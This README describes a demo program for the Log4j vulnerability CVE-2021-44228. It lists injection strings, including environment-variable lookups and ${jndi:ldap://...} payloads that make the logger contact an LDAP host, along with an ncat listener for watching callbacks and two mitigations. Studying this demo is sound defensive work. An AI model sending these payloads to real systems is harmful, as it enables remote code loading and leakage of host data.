## https://sploitus.com/exploit?id=9326CB66-BADC-5643-B118-F38C39A9E34C
# Log4j_Vulnerability_Demo
A simple program that demonstrates how the Log4j vulnerability (CVE-2021-44228) can be exploited.
## Running the Demo :
To start the program, run start.sh (on UNIX systems) or start.bat (on Windows).
User input will be read and logged to console using the Log4j framework.
### Some sample inputs :
testing ( Normal String )
### Examples which can be more than just a log message :
#### ${env:USER} ( UNIX )
#### ${env:USERNAME} ( Windows )
#### ${jndi:ldap://test.java.net}
#### ${jndi:ldap://localhost:12000}
--
### Monitoring :
#### tcpdump -i any | grep -i "java.net"
#### ncat -k -vv -c "echo hi" -l 12000
--
### Removing the JndiLookup Class :
#### zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
--
### Disabling JNDI Lookups
#### export LOG4J_FORMAT_MSG_NO_LOOKUPS=true